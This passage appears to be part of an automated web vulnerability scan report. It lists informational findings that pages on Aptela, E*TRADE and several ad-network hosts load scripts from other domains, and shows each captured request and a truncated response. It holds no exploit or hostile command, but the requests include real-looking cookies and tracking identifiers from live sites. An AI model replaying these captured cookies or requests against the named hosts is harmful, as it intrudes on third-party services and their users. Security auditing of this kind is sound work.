<script type="text/javascript" src="http://l.yimg.com/zz/combo?d/lib/yui/2.9.0/build/yahoo/yahoo-min.js&d/lib/yui/2.9.0/build/event/event-min.js&d/lib/yui/2.9.0/build/dom/dom-min.js&d/lib/yui/2.9.0/build/imageloader/imageloader-min.js&d/lib/yui/2.9.0/build/get/get-min.js&d/lib/yui/2.9.0/build/connection/connection-min.js&d/lib/yui/2.9.0/build/animation/animation-min.js&d/lib/yui/2.9.0/build/json/json-min.js&d/lib/yui/2.9.0/build/container/container-min.js&d/lib/yui/2.9.0/build/element/element-min.js&d/lib/yui/2.9.0/build/cookie/cookie-min.js&d/lib/media/phugc/mwphcom_min_r142.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/js/ult_bottom.r143221;js/teamtracker.r143221.js?m"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

16.43. http://support.aptela.com:9000/tools/ResetPassword.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.aptela.com:9000
Path:   /tools/ResetPassword.cgi

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /tools/ResetPassword.cgi HTTP/1.1
Host: support.aptela.com:9000
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/my-account/login-error/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; WRUID=1480628145.1067928662; jkid=None; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; __utma=207344579.967367889.1315327921.1315327921.1315329987.2; __utmb=207344579.8.10.1315329987; __utmc=207344579; __utmz=207344579.1315329987.2.2.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:48 GMT
Server: Apache/2.0.55 (Ubuntu) mod_jk/1.2.20 PHP/5.1.2 mod_ssl/2.0.55 OpenSSL/0.9.8a
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 2021


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Aptela Password Request</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta htt
...[SNIP]...
<td valign="top">
<script src="http://api.recaptcha.net/challenge?k=6LcRywAAAAAAAIijUtl1YQuO3f7q2GQasRd83JZx" type="text/javascript"></script>
...[SNIP]...

16.44. http://udmserve.net/udm/img.fetch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://udmserve.net
Path:   /udm/img.fetch

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /udm/img.fetch?sid=2900;tid=1;ev=1;dt=1; HTTP/1.1
Host: udmserve.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=4;sz=728x90;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP='NOI DSP CURa ADMa DEVa PSAa PSDa OUR IND UNI COM NAV INT'
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa PSAa PSDa OUR IND UNI COM NAV INT"
Set-Cookie: udm1=9173:1:63440343958:2:2900:0:0:63440343958:1:1|; domain=udmserve.net; path=/; expires=Wed, 05-Sep-2012 12:45:58 GMT
Set-Cookie: dt=9b3eab00-120f-460c-84d6-3607c7ca9d48; domain=udmserve.net; path=/; expires=Wed, 05-Sep-2012 12:45:58 GMT
Expires: Mon, 05 Sep 2011 12:45:58 GMT
Date: Tue, 06 Sep 2011 12:45:58 GMT
Content-Type: text/html; charset=ISO-8859-1
Server: lighttpd/1.4.28
Content-Length: 1337

<!DOCTYPE html
   PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

16.45. https://us.etrade.com/e/t/jumppage/viewjumppage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://us.etrade.com
Path:   /e/t/jumppage/viewjumppage

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /e/t/jumppage/viewjumppage?PageName=top_bullish_stocks&SC=S047401&o_id=60DAY+500&symbol=&ch_id=d&s_id=yhoo&c_id=BLLST HTTP/1.1
Host: us.etrade.com
Connection: keep-alive
Referer: http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313295039208?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&encver=1&encalgo=3DES-CFB-SHA1&app=apt&intf=1&click=http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:06 GMT
Server: Apache
Keep-Alive: timeout=60, max=400
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 24371


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
    <title>Today's Top 10 Bullish Stocks | E*TRADE Securities</title>
   
...[SNIP]...
<![endif]-->
   
    <script TYPE="text/javascript" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/js/nav.js" ></script>
    <script TYPE="text/javascript" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/javascript/global_nav.js" ></script>
    <script TYPE="text/javascript" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/javascript/jquery/jquery.min.js" ></script>
    <script TYPE="text/javascript" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/javascript/prospect/tooltip_popup.js" ></script>
    <!-- Site Catalyst -->
    <script TYPE="text/javascript" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/javascript/omntr/s_code.js" ></script>
    <script TYPE="text/javascript" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/javascript/omntr/mbox.js" ></script>
...[SNIP]...

16.46. http://utdi.reachlocal.net/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.html HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:06 GMT
Server: ConcentricHost-Ashurbanipal/2.0 (Concentric(R))
X-RL-Host: pweb109
X-Robots-Tag: noindex,nofollow
Last-Modified: Wed, 31 Aug 2011 22:29:49 GMT
ETag: "15f966a-5607-4e5eb5dd"
Accept-Ranges: bytes
Content-Type: text/html
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 22692
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7c45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:00 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><meta name="robots" content="noindex,nofollow" />
<meta http-equiv="Content-Type" co
...[SNIP]...
</html>

<script type="text/javascript" src="//rtsys.rtrk.com/js/TrackLandingPage_src.js">
</script>
...[SNIP]...

16.47. http://view.atdmt.com/TR1/iview/332867993/direct/01  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /TR1/iview/332867993/direct/01

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /TR1/iview/332867993/direct/01?time=1315313115&click=http://ads.bluelithium.com/clk?3,eAGlkEtvm0AUhf9MV5XLzDAzDAmaxfBweBhjHBybbCweDg7ggoHIpr--qK6t7ns255Ou7rm6B2EtQ.SDoYMCP57QQWW5hrCMDxlVkIpmUNM0mamEyQRBONt5G1PYxtIR-tlpN-KmrnXDvyiEL5w7QyFCYRqu8jX5H3lJf71P.8.N3H0cmg4Wt7Ria89XpaM.sk3rEkfhZSnHZLENSWDGgx.Na9-AJD754yLKyHuUV370dlq-LCv.sSj47DgM7TMARd2kSS0lXS6NybFppKw5gVfnhSN6VoqirA.A50xlKsYSIiqEmLAJ6CQZTYAYIzIDJu.bpht68MplqihElemzv7YMsB.rgYvyTTlXaZ.1QWevrzT2gvgTQvozznQQ81jYQQCs3YojjCiWIYYULHjWtNf91nNWFmvFui2jWrqUoav6x5wlFT3Nc0sYi.0voPN4311FrpvrsfgB3FvMlAUpQ1h9YsDjnZpcdtmmcu0yTT9x-D6mWRMCwRVCCcIErDkE37.da7l9808lvwEx7qgw, HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAHCNIABqIpUAAAAAAArpJQAAAAAAAAAMAIAAAAAAAA0AAQADCJ6uAQAAAAAAKasxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAgAAAAAAAIBYzSd4lD8AAMR19m7APwAAAAAAAAAAAADEdfZuwD8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABTzbx8WfquCrkAQGF3mkTKtl2.WiYSu9rp2McYAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15q6ggjle%2FM%3D787833.14800347.14555521.14177427%2FD%3Dsports%2FS%3D25664825%3AMREC%2F_ylt%3DAjV6qkbscsOrHRx5YKOYi005nYcB%2FY%3DYAHOO%2FEXP%3D1315320305%2FL%3Dcopx_WKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL_z%2FB%3DY_rxAdBDRyg-%2FJ%3D1315313105713897%2FK%3Dr8awXcUkJHjbbi3QZybcoQ%2FA%3D6454134%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2F,B%3D10%26S%3D14800347%26Z%3D300x100%26_PVID%3Dcopx%255fWKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL%255fz%26_salt%3D678154096%26cb%3D1315313105713897%26i%3D140509%26r%3D0%26ycg%3D%26yyob%3D%26zip%3D,10a407f8-d886-11e0-8bc2-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:15 GMT
Connection: close
Content-Length: 9420

<html><head><title>multipolicy_300x100</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;"
...[SNIP]...
</noscript>
<script type="text/javascript" language="javascript" src="http://cdn.doubleverify.com/script361.js?agnc=1024037&cmp=123400100201TR1&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=332867993&advid=1024038&sid=332867993&adid="></script><script type="text/javascript" language="javascript" src="http://cdn.doubleverify.com/script361.js?agnc=1024037&cmp=1042775&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=332867993&advid=1043704&sid=332867993&adid="></script>
...[SNIP]...

16.48. http://www.aptela.com/lp2011/T2V1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /lp2011/T2V1/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lp2011/T2V1/?utm_source=google&utm_medium=ppc&utm_term=business_telephone_service&utm_campaign=phones_business&refcd=GO000000516757112s_business_telephone_service&tsacr=GO7010955737&_kk=e5cfc5b1-4c17-4425-8b78-9c87aae9c019&_kt=7010955737&gclid=CMqnsqPHiKsCFRM2gwodbCP53A HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:59 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<!-- Google Website Optimizer Co
...[SNIP]...
</script>

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://munchkin.marketo.net/js/munchkin.js"></script>
...[SNIP]...
</p>

   
<script src="http://thesearchagency.net/tsawaypoint.php?siteid=784&wayid=6025" language="JavaScript" type="text/javascript"></script>    

<SCRIPT type="text/javascript" src="https://lct.salesforce.com/sfga.js"></SCRIPT>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

16.49. http://www.aptela.com/mainstylesheet.css/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /mainstylesheet.css/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mainstylesheet.css/ HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://support.aptela.com:9000/tools/ResetPassword.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; exp_last_visit=999966382; WRUID=1480628145.1067928662; exp_last_activity=1315326402; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fmy-account%2Flogin-error%2F%22%3Bi%3A1%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A2%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; jkid=None; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; __utma=207344579.967367889.1315327921.1315327921.1315329987.2; __utmb=207344579.8.10.1315329987; __utmc=207344579; __utmz=207344579.1315329987.2.2.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 12:26:49 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1315326409; expires=Wed, 05-Sep-2012 12:26:49 GMT; path=/
Vary: Accept-Encoding
Content-Length: 15669
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>


<title> Pag
...[SNIP]...
<!-- END custom searchforce integration -->


<script src="http://thesearchagency.net/tsawaypoint.php?siteid=784&wayid=6025" language="JavaScript" type="text/javascript"></script>
...[SNIP]...
</script> <script type="text/javascript" language="javascript" src="//verify.authorize.net/anetseal/seal.js" ></script>
...[SNIP]...
<!-- ClickTale end of Bottom part -->


<SCRIPT type="text/javascript" src="https://lct.salesforce.com/sfga.js"></SCRIPT>
...[SNIP]...
</SCRIPT>


<script src="http://munchkin.marketo.net/munchkin.js"
type="text/javascript">
</script>
...[SNIP]...

16.50. http://www.aptela.com/misc/privacy-policy/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /misc/privacy-policy/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /misc/privacy-policy/ HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/lp2011/T2V1/?utm_source=google&utm_medium=ppc&utm_term=business_telephone_service&utm_campaign=phones_business&refcd=GO000000516757112s_business_telephone_service&tsacr=GO7010955737&_kk=e5cfc5b1-4c17-4425-8b78-9c87aae9c019&_kt=7010955737&gclid=CMqnsqPHiKsCFRM2gwodbCP53A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; __utma=207344579.967367889.1315327921.1315327921.1315327921.1; __utmc=207344579; __utmz=207344579.1315327921.1.1.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; WRUID=1480628145.1067928662

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:22 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1315326382; expires=Wed, 05-Sep-2012 12:26:22 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fmisc%2F404%2F%22%3Bi%3A2%3Bs%3A31%3A%22%2F33c420cd2ee5ef0c134a240a%2FT2V1%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2F33c420cd2c9d489cd0318b99%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:26:22 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 20963
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>


<title>Privacy Poli
...[SNIP]...
<meta name="robots" content="noodp, noydir" />

<script type="text/javascript" src="http://use.typekit.com/apb3goi.js"></script>
...[SNIP]...
</script>

<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
<script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
<!-- END custom searchforce integration -->


<script src="http://thesearchagency.net/tsawaypoint.php?siteid=784&wayid=6025" language="JavaScript" type="text/javascript"></script>
...[SNIP]...
</script> <script type="text/javascript" language="javascript" src="//verify.authorize.net/anetseal/seal.js" ></script>
...[SNIP]...
<!-- ClickTale end of Bottom part -->


<SCRIPT type="text/javascript" src="https://lct.salesforce.com/sfga.js"></SCRIPT>
...[SNIP]...
</SCRIPT>


<script src="http://munchkin.marketo.net/munchkin.js"
type="text/javascript">
</script>
...[SNIP]...

16.51. http://www.aptela.com/my-account/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /my-account/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /my-account/ HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/misc/privacy-policy/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; exp_last_visit=999966382; exp_last_activity=1315326382; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; jkid=None; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; WRUID=1480628145.1067928662; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; __utma=207344579.967367889.1315327921.1315327921.1315329987.2; __utmb=207344579.2.10.1315329987; __utmc=207344579; __utmz=207344579.1315329987.2.2.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:28 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1315326388; expires=Wed, 05-Sep-2012 12:26:28 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:26:29 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 12258
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>


<title> My Account
...[SNIP]...
<meta name="robots" content="noodp, noydir" />

<script type="text/javascript" src="http://use.typekit.com/apb3goi.js"></script>
...[SNIP]...
</script>

<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
<script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
<!-- END custom searchforce integration -->


<script src="http://thesearchagency.net/tsawaypoint.php?siteid=784&wayid=6025" language="JavaScript" type="text/javascript"></script>
...[SNIP]...
</script> <script type="text/javascript" language="javascript" src="//verify.authorize.net/anetseal/seal.js" ></script>
...[SNIP]...
<!-- /wrapper -->
   

<SCRIPT type="text/javascript" src="https://lct.salesforce.com/sfga.js"></SCRIPT>
...[SNIP]...
</SCRIPT>


<script src="http://munchkin.marketo.net/munchkin.js"
type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

16.52. http://www.aptela.com/my-account/login-error/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /my-account/login-error/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /my-account/login-error/ HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/my-account/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; exp_last_visit=999966382; WRUID=1480628145.1067928662; exp_last_activity=1315326388; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; jkid=None; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; __utma=207344579.967367889.1315327921.1315327921.1315329987.2; __utmb=207344579.4.10.1315329987; __utmc=207344579; __utmz=207344579.1315329987.2.2.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:36 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1315326396; expires=Wed, 05-Sep-2012 12:26:36 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fmy-account%2Flogin-error%2F%22%3Bi%3A1%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A2%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:26:36 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 12464
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>


<meta http-equi
...[SNIP]...
<meta name="robots" content="noodp, noydir" />

<script type="text/javascript" src="http://use.typekit.com/apb3goi.js"></script>
...[SNIP]...
</script>

